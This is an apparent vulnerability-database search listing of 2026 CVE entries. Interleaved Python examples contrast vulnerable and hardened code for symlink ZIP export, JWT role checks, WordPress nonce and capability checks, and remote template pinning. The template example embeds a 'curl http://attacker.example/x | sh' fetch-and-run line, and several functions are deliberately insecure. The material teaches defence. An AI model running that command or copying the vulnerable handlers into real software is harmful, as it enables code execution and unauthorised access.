
265 matches found

Cvelist, added 2026/04/22 7:45 a.m.

CVE-2026-4119 Create DB Tables <= 1.2.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Database Table Creation/Deletion via admin-post.php

The Create DB Tables plugin for WordPress is vulnerable to authorization bypass in all versions up to and including 1.2.1. The plugin registers admin_post action hooks for creating tables (adminpostaddtable) and deleting tables (adminpostdeletedbtable) without implementing any capability checks via...

CVSS 9.1, EPSS 0.00729
Exploits: 0, References: 13

ATTACKERKB, added 2026/04/22 7:45 a.m.

CVE-2026-4090

The Inquiry Cart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.2. This is due to missing nonce verification in the rdicsettingspage function when processing settings form submissions. This makes it possible for unauthenticated attackers...

CVSS 6.1, AI score 5.7, EPSS 0.00243
Exploits: 0, References: 18

Vulnrichment, added 2026/04/22 7:45 a.m.

CVE-2026-4280 Breaking News WP <= 1.3 - Missing Authorization to Authenticated (Subscriber+) Local File Inclusion/Read

The Breaking News WP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3. This is due to the brnwpajaxform AJAX endpoint lacking both authorization checks and CSRF verification, combined with insufficient path validation when the brnwptheme option...

CVSS 6.5, AI score 5.8, EPSS 0.00814
Exploits: 0, References: 7

CVE, added 2026/04/22 12:49 a.m.

CVE-2026-40344

MinIO is affected by an authentication bypass in the Snowball auto-extract handler (PutObjectExtractHandler) prior to RELEASE.2026-04-11T03:20:12Z. An attacker with a valid access key (including the default minioadmin or any key with WRITE on a bucket) can write arbitrary objects to any bucket wi...

CVSS 8.8, AI score 6.1, EPSS 0.00418
Exploits: 0, References: 3, Affected software: 1

NVD, added 2026/04/17 8:16 p.m.

CVE-2026-40434

Anviz CrossChex Standard lacks source verification in the client/server channel, enabling TCP packet injection by an attacker on the same network to alter or disrupt application traffic...

CVSS 8.1, EPSS 0.00231
Exploits: 0, References: 3

Debian CVE, added 2026/04/17 7:27 p.m.

CVE-2026-32105

xrdp is an open source RDP server. In versions through 0.10.5, xrdp does not verify the Message Authentication Code (MAC) signature of encrypted RDP packets when using the "Classic RDP Security" layer. While the sender correctly generates signatures, the receiving logic lacks th...

CVSS 9.3, AI score 5.3, EPSS 0.00174
Exploits: 0

EUVD, added 2026/04/16 9:31 p.m.

EUVD-2025-209510

A missing lock verification in AMD Secure Processor (ASP) firmware may permit a locally authenticated attacker with administrative privileges to alter MMIO routing on some Zen 5-based products, potentially compromising guest system integrity...

CVSS 5.9, AI score 5.8, EPSS 0.00108
Exploits: 1, References: 2

Github Security Blog, added 2026/04/16 8:43 p.m.

Weblate: Arbitrary File Read via Symlink

Impact: The ZIP download feature did not verify the files it packaged and could follow symlinks to locations outside the repository. Patches: https://github.com/WeblateOrg/weblate/pull/18683 References: Thanks to @DavidCarliez for reporting this vulnerability via GitHub...

CVSS 7.7, AI score 5.8, EPSS 0.00465
Exploits: 0, References: 4, Affected software: 1

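The Weblate entry above describes an archiver that followed symlinks out of the repository. The following is an added example, not Weblate's code: it builds a constructed checkout in a temporary directory, plants a symlink that points at a file outside it, and contrasts a naive ZIP builder (which ships the symlink target) with a hardened one that lstat()s every entry, skips symlinks, and re-checks that the resolved path stays under the root. All paths, file names and contents are constructed for the demonstration.

```python
"""Packaging a checkout into a ZIP without following symlinks (added example)."""
import io
import os
import stat
import tempfile
import zipfile


def zip_tree_naive(root: str) -> bytes:
    # Vulnerable pattern: ZipFile.write() opens the path, so a symlink inside the tree
    # is silently replaced by the contents of whatever it points to.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                zf.write(path, arcname=os.path.relpath(path, root))
    return buf.getvalue()


def zip_tree_hardened(root: str) -> tuple[bytes, list[str]]:
    # Hardened pattern: lstat() every entry, refuse anything that is a symlink, and
    # double-check that the resolved path still lies under the repository root.
    root = os.path.realpath(root)
    buf = io.BytesIO()
    skipped: list[str] = []
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for dirpath, dirs, files in os.walk(root, followlinks=False):
            for name in files + dirs:
                path = os.path.join(dirpath, name)
                rel = os.path.relpath(path, root)
                st = os.lstat(path)                       # lstat: do not resolve links
                if stat.S_ISLNK(st.st_mode):
                    skipped.append(rel)
                    continue
                if not stat.S_ISREG(st.st_mode):          # directories, sockets, ...
                    continue
                if os.path.commonpath([root, os.path.realpath(path)]) != root:
                    skipped.append(rel)                   # bind mounts, races, ...
                    continue
                zf.write(path, arcname=rel)
    return buf.getvalue(), skipped


def zip_names(blob: bytes) -> list[str]:
    return sorted(zipfile.ZipFile(io.BytesIO(blob)).namelist())


def zip_read(blob: bytes, name: str) -> bytes:
    return zipfile.ZipFile(io.BytesIO(blob)).read(name)


def build_demo() -> dict:
    """Constructed repo: one real file plus a symlink to a secret outside the repo."""
    outside = tempfile.mkdtemp(prefix="outside-")
    secret_path = os.path.join(outside, "id_ed25519")
    with open(secret_path, "wb") as f:
        f.write(b"-----CONSTRUCTED PRIVATE KEY-----\n")

    repo = tempfile.mkdtemp(prefix="repo-")
    with open(os.path.join(repo, "README.md"), "wb") as f:
        f.write(b"# demo project\n")
    os.symlink(secret_path, os.path.join(repo, "leak"))   # attacker-controlled symlink

    naive = zip_tree_naive(repo)
    hardened, skipped = zip_tree_hardened(repo)
    return {
        "naive_names": zip_names(naive),
        "naive_leak": zip_read(naive, "leak"),
        "hardened_names": zip_names(hardened),
        "skipped": skipped,
    }


if __name__ == "__main__":
    for key, value in build_demo().items():
        print(f"{key}: {value}")
```

The realpath check after the lstat is deliberate: a symlink check alone does not cover a directory that was bind-mounted or swapped underneath the walk, and the two checks together cost one extra stat per entry.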
RedhatCVE, added 2026/04/16 7:22 p.m.

CVE-2026-3642

The e-shot™ form builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.2. The eshotformbuilderupdatefielddata AJAX handler lacks any capability checks (current_user_can) or nonce verification (check_ajax_referer/wp_verify_nonce). The function is...

CVSS 5.3, AI score 5.7, EPSS 0.00367
Exploits: 0, References: 1

CNNVD, added 2026/04/16 12:00 a.m.

AMD EPYC security vulnerability

AMD EPYC is a high-performance server processor developed by the American semiconductor company AMD. AMD EPYC has a security vulnerability that stems from missing lock verification. The vulnerability could allow modifications to MMIO routes and undermine the integrity of customer systems...

CVSS 5.9, AI score 5.8, EPSS 0.00108
Exploits: 1, References: 1

ATTACKERKB, added 2026/04/15 8:28 a.m.

CVE-2026-3642

The e-shot™ form builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.2. The eshotformbuilderupdatefielddata AJAX handler lacks any capability checks (current_user_can) or nonce verification (check_ajax_referer/wp_verify_nonce). The function is...

CVSS 5.3, AI score 5.7, EPSS 0.00367
Exploits: 0, References: 6

CNNVD, added 2026/04/15 12:00 a.m.

WordPress plugin Product Pricing Table by WooBeWoo security vulnerability

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed in PHP that allows personal blog sites to be created on PHP and MySQL based servers. A WordPress plugin is an application extension. The...

CVSS 6.1, AI score 5.9, EPSS 0.00126
Exploits: 0, References: 1

CNNVD, added 2026/04/15 12:00 a.m.

WordPress plugin e-shot form builder security vulnerability

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed in PHP that allows personal blog sites to be created on PHP and MySQL based servers. A WordPress plugin is an application extension. WordPres...

CVSS 5.3, AI score 5.8, EPSS 0.00367
Exploits: 0, References: 2

RedhatCVE, added 2026/04/13 7:24 p.m.

CVE-2026-4401

The Download Monitor plugin for WordPress is vulnerable to Cross-Site Request Forgery in the actionshandler and bulkactionshandler methods in class-dlm-downloads-path.php in all versions up to, and including, 5.1.10. This is due to missing nonce verification on these functions. This makes it...

CVSS 5.4, AI score 5.6, EPSS 0.00161
Exploits: 0, References: 1

RedhatCVE, added 2026/04/10 7:22 p.m.

CVE-2026-35063

The OpenPLC V3 REST API endpoint checks for JWT presence but never verifies the caller's role. Any authenticated user with role=user can delete any other user, including administrators, by specifying their user ID, or can create new accounts with role=admin, escalating to full administrator access...

CVSS 8.8, AI score 5.8, EPSS 0.0024
Exploits: 0, References: 1

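The OpenPLC entry above is the classic "authenticated is not authorized" bug: the endpoint checks that a JWT is present, never that its role claim permits the action. The following added example (not OpenPLC's code) builds and verifies HS256 JWTs with the standard library only and puts a vulnerable handler next to a hardened one that enforces the signed role claim. The secret, the user table, the handler names and the token lifetimes are constructed for the demonstration.

```python
"""JWT: token presence/validity versus the caller's role (added example)."""
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-demo-secret"        # would come from configuration in practice


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(user_id: int, role: str, ttl: int = 3600, now=None) -> str:
    now = time.time() if now is None else now
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps({"sub": user_id, "role": role, "exp": int(now) + ttl}).encode())
    sig = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_token(token: str, now=None) -> dict:
    """Authentication only: returns the signed claims or raises PermissionError."""
    parts = token.split(".")
    if len(parts) != 3:
        raise PermissionError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    if json.loads(_unb64url(header_b64)).get("alg") != "HS256":   # no alg=none / confusion
        raise PermissionError("unexpected alg")
    expected = hmac.new(SECRET, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64url(sig_b64)):
        raise PermissionError("bad signature")
    claims = json.loads(_unb64url(payload_b64))
    if claims.get("exp", 0) <= (time.time() if now is None else now):
        raise PermissionError("token expired")
    return claims


def _require_role(claims: dict, role: str) -> None:
    # Authorization: the role is taken from the *signed* claims, never from the request.
    if claims.get("role") != role:
        raise PermissionError(f"{role} role required")


# Pattern behind the advisory: a valid token is enough to delete anyone.
def delete_user_vulnerable(token: str, target_id: int, users: dict) -> bool:
    verify_token(token)
    users.pop(target_id, None)
    return True


# Hardened: verify, then enforce the role claim on every privileged endpoint.
def delete_user(token: str, target_id: int, users: dict) -> bool:
    claims = verify_token(token)
    _require_role(claims, "admin")
    if claims["sub"] == target_id:
        raise ValueError("refusing to delete the calling administrator")
    users.pop(target_id, None)
    return True


def create_user(token: str, new_id: int, role: str, users: dict) -> bool:
    claims = verify_token(token)
    _require_role(claims, "admin")             # only admins may choose a role at all
    if role not in ("admin", "user"):
        raise ValueError("unknown role")
    users[new_id] = role
    return True


def _attempt(fn, *args):
    try:
        return fn(*args)
    except PermissionError as exc:
        return str(exc)


def demo() -> dict:
    """Constructed users: id 1 is the administrator, id 2 an ordinary user."""
    users = {1: "admin", 2: "user"}
    user_tok, admin_tok = issue_token(2, "user"), issue_token(1, "admin")
    # Same token with the role claim rewritten to admin: the signature no longer matches.
    h, _p, s = user_tok.split(".")
    forged = f"{h}.{_b64url(json.dumps({'sub': 2, 'role': 'admin', 'exp': 4102444800}).encode())}.{s}"
    return {
        "vuln_user_deletes_admin": _attempt(delete_user_vulnerable, user_tok, 1, dict(users)),
        "hardened_user_deletes_admin": _attempt(delete_user, user_tok, 1, dict(users)),
        "hardened_user_creates_admin": _attempt(create_user, user_tok, 3, "admin", dict(users)),
        "hardened_admin_deletes_user": _attempt(delete_user, admin_tok, 2, dict(users)),
        "forged_role_claim": _attempt(delete_user, forged, 1, dict(users)),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The role check lives in one helper that every privileged handler calls after verification; when a codebase has one decorator for "is there a token" and no counterpart for "what may this token do", bugs of this shape follow.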
EUVD, added 2026/04/10 6:31 a.m.

EUVD-2026-21292

In wolfSSL's EVP layer, the ChaCha20-Poly1305 AEAD decryption path in wolfSSL_EVP_CipherFinal and related EVP cipher finalization functions fails to verify the authentication tag before returning plaintext to the caller. When an application uses the EVP API to perform ChaCha20-Poly1305 decryption,...

CVSS 7.6, AI score 5.9, EPSS 0.00152
Exploits: 0, References: 2

CVE, added 2026/04/10 2:38 a.m.

CVE-2026-5479

In wolfSSL, the ChaCha20-Poly1305 AEAD decryption path in the EVP layer (wolfSSL_EVP_CipherFinal and related finalization functions) fails to verify the authentication tag before returning plaintext. As a result, when using the EVP API to decrypt ChaCha20-Poly1305, the tag may be computed or acce...

CVSS 8.1, AI score 5.9, EPSS 0.00152
Exploits: 0, References: 1, Affected software: 1

Vulnrichment, added 2026/04/10 1:24 a.m.

CVE-2026-1924 Aruba HiSpeed Cache <= 3.0.4 - Cross-Site Request Forgery to Plugin Settings Reset

The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.4. This is due to missing nonce verification on the ahscajaxresetoptions function. This makes it possible for unauthenticated attackers to reset all plugin settings t...

CVSS 4.3, AI score 5.6, EPSS 0.00181
Exploits: 0, References: 4

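The WordPress plugin entries in this listing (CVE-2026-4119, CVE-2026-4090, CVE-2026-4280, CVE-2026-3642, CVE-2026-4401 and CVE-2026-1924) fail one or both of the two checks every privileged admin-post or AJAX handler needs: a capability check and a nonce check. The following added example is not code from any of those plugins and is a Python model of the WordPress primitives rather than PHP: the nonce scheme mirrors wp_create_nonce/wp_verify_nonce (an HMAC over a 12-hour tick, the action and the user id, with the current and previous tick accepted), and the capability table, salt, action name and table names are constructed. It also shows why a nonce alone does not close the missing-authorization cases: a subscriber can mint a perfectly valid nonce for their own session.

```python
"""Capability check plus nonce check for a privileged admin action (added example)."""
import hashlib
import hmac
import re
import time

NONCE_SALT = b"constructed-nonce-salt"       # stand-in for wp_salt('nonce')
TICK_SECONDS = 12 * 60 * 60                  # wp_nonce_tick(): half of the 24h lifetime
CAPABILITIES = {                             # constructed subset of WordPress roles
    "administrator": {"read", "manage_options"},
    "subscriber": {"read"},
}
TABLE_NAME = re.compile(r"^[a-z][a-z0-9_]{0,63}$")


def current_user_can(user: dict, capability: str) -> bool:
    return capability in CAPABILITIES.get(user["role"], set())


def _tick(now: float) -> int:
    return int(now // TICK_SECONDS)


def _nonce_for(tick: int, action: str, user_id: int) -> str:
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(NONCE_SALT, msg, hashlib.sha256).hexdigest()[-12:]


def create_nonce(action: str, user: dict, now: float = None) -> str:
    now = time.time() if now is None else now
    return _nonce_for(_tick(now), action, user["id"])


def verify_nonce(nonce: str, action: str, user: dict, now: float = None) -> bool:
    """Like wp_verify_nonce(): the current tick or the previous one is valid."""
    now = time.time() if now is None else now
    for age in (0, 1):
        if hmac.compare_digest(_nonce_for(_tick(now) - age, action, user["id"]), nonce):
            return True
    return False


def delete_table_vulnerable(user: dict, params: dict, tables: set) -> str:
    # Pattern behind the advisories: the handler trusts that being logged in (or merely
    # reaching the endpoint) is enough.
    tables.discard(params["table"])
    return "deleted"


def delete_table(user: dict, params: dict, tables: set) -> str:
    # 1. Authorization: does *this* user hold the capability?  (current_user_can)
    if not current_user_can(user, "manage_options"):
        raise PermissionError("403: manage_options required")
    # 2. CSRF: was the request produced by a form or link we issued to this user?
    #    (check_admin_referer / wp_verify_nonce)
    if not verify_nonce(params.get("_wpnonce", ""), "delete_db_table", user):
        raise PermissionError("403: nonce check failed")
    # 3. Validate the privileged parameter before touching the database.
    if not TABLE_NAME.match(params.get("table", "")):
        raise ValueError("invalid table name")
    tables.discard(params["table"])
    return "deleted"


def demo() -> dict:
    admin = {"id": 1, "role": "administrator"}
    subscriber = {"id": 7, "role": "subscriber"}
    action = "delete_db_table"
    out = {"vuln": delete_table_vulnerable(subscriber, {"table": "wp_users"}, {"wp_users"})}
    attempts = {
        "subscriber_with_own_nonce": (subscriber, {"table": "wp_users", "_wpnonce": create_nonce(action, subscriber)}),
        "admin_without_nonce": (admin, {"table": "wp_users"}),
        "admin_with_foreign_nonce": (admin, {"table": "wp_users", "_wpnonce": create_nonce(action, subscriber)}),
        "admin_with_nonce": (admin, {"table": "wp_users", "_wpnonce": create_nonce(action, admin)}),
    }
    for name, (user, params) in attempts.items():
        try:
            out[name] = delete_table(user, params, {"wp_users"})
        except PermissionError as exc:
            out[name] = str(exc)
    # Nonce lifetime: minted at tick 0, still valid one tick later, rejected after three.
    old = create_nonce(action, admin, now=0)
    out["previous_tick_nonce"] = verify_nonce(old, action, admin, now=TICK_SECONDS)
    out["expired_nonce"] = verify_nonce(old, action, admin, now=3 * TICK_SECONDS)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The order matters in practice as well: the capability check comes first because it is the one that actually decides who may perform the action, and the nonce check only establishes that the request came from a page the site itself served to that user.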
CNNVD, added 2026/04/10 12:00 a.m.

PraisonAI code issue vulnerability

PraisonAI is a low-code multi-agent collaboration framework developed by Mervin Praison. Versions of PraisonAI prior to 1.5.128 contain a code vulnerability that stems from the webcrawl's httpx fallback path, which passed the user-provided URL directly to...

CVSS 7.1, AI score 5.9, EPSS 0.00281
Exploits: 1, References: 1

Vulnrichment, added 2026/04/09 9:42 p.m.

CVE-2026-40154 PraisonAI Affected by Untrusted Remote Template Code Execution

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through malicious templates. This vulnerability is fixed in...

CVSS 9.3, AI score 5.8, EPSS 0.00304
Exploits: 1, References: 1

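The CVE-2026-40154 entry above names the three missing controls for remotely fetched templates: integrity verification, origin validation and user confirmation. The following added example (not PraisonAI's code) implements exactly those three gates in front of a template loader: an HTTPS origin allowlist, a SHA-256 pin table with constant-time comparison, and an explicit confirmation callback for templates that have no pin yet, after which the digest is recorded. The template bytes, URLs, allowlisted host and pin are constructed, and the fetcher is injected so the example runs offline.

```python
"""Integrity, origin and confirmation gates for remote templates (added example)."""
import hashlib
import hmac
from urllib.parse import urlparse

# Constructed known-good template and the pin an operator would ship with the project.
GOOD_TEMPLATE = b"name: researcher\nrole: Analyst\ntools: [search]\n"
TEMPLATE_URL = "https://raw.githubusercontent.com/example/templates/main/researcher.yaml"
PINS = {TEMPLATE_URL: hashlib.sha256(GOOD_TEMPLATE).hexdigest()}   # computed here for the demo
TRUSTED_HOSTS = {"raw.githubusercontent.com"}                       # constructed allowlist


def fetch_ok(url: str) -> bytes:           # constructed fetcher: serves the good template
    return GOOD_TEMPLATE


def fetch_tampered(url: str) -> bytes:     # constructed fetcher: repo, CDN or MITM compromise
    return GOOD_TEMPLATE + b"on_load: curl http://attacker.example/x | sh\n"


class UntrustedTemplate(Exception):
    def __init__(self, reason: str, detail: str):
        super().__init__(f"{reason}: {detail}")
        self.reason = reason


def load_template_vulnerable(url: str, fetch) -> bytes:
    # Pattern in the advisory: whatever comes back is handed to the loader as trusted.
    return fetch(url)


def load_template(url: str, fetch, pins: dict = PINS, confirm=lambda url, digest: False) -> bytes:
    """Origin allowlist -> fetch -> digest pin (or explicit confirmation) -> bytes."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname not in TRUSTED_HOSTS:
        raise UntrustedTemplate("origin not allowed", f"{parsed.scheme}://{parsed.hostname}")
    data = fetch(url)
    digest = hashlib.sha256(data).hexdigest()
    expected = pins.get(url)
    if expected is None:
        # Unknown template: never load silently. Require an explicit decision that sees
        # the digest it is approving, then pin it (trust on first use, with a prompt).
        if not confirm(url, digest):
            raise UntrustedTemplate("no pin", f"{url} sha256={digest}")
        pins[url] = digest
        return data
    if not hmac.compare_digest(expected, digest):
        raise UntrustedTemplate("pin mismatch", f"{url} expected {expected} got {digest}")
    return data


def demo() -> dict:
    out = {"vuln_loads_tampered": b"on_load" in load_template_vulnerable(TEMPLATE_URL, fetch_tampered)}
    out["pinned_ok"] = load_template(TEMPLATE_URL, fetch_ok) == GOOD_TEMPLATE
    cases = {
        "tampered": (TEMPLATE_URL, fetch_tampered),
        "bad_origin": ("http://evil.example/researcher.yaml", fetch_ok),
        "unpinned_no_confirm": ("https://raw.githubusercontent.com/example/other/main/x.yaml", fetch_ok),
    }
    for name, (url, fetch) in cases.items():
        try:
            load_template(url, fetch)
            out[name] = "accepted"
        except UntrustedTemplate as exc:
            out[name] = exc.reason
    # An unpinned template is accepted only after confirmation, and is pinned from then on.
    pins = dict(PINS)
    url2 = "https://raw.githubusercontent.com/example/other/main/x.yaml"
    load_template(url2, fetch_ok, pins, confirm=lambda u, d: True)
    out["tofu_pinned"] = pins[url2] == hashlib.sha256(GOOD_TEMPLATE).hexdigest()
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In a real project the pin table is a committed lockfile, not a value computed at import time as it is here, and the confirmation callback is the interactive prompt or a signed approval rather than a lambda.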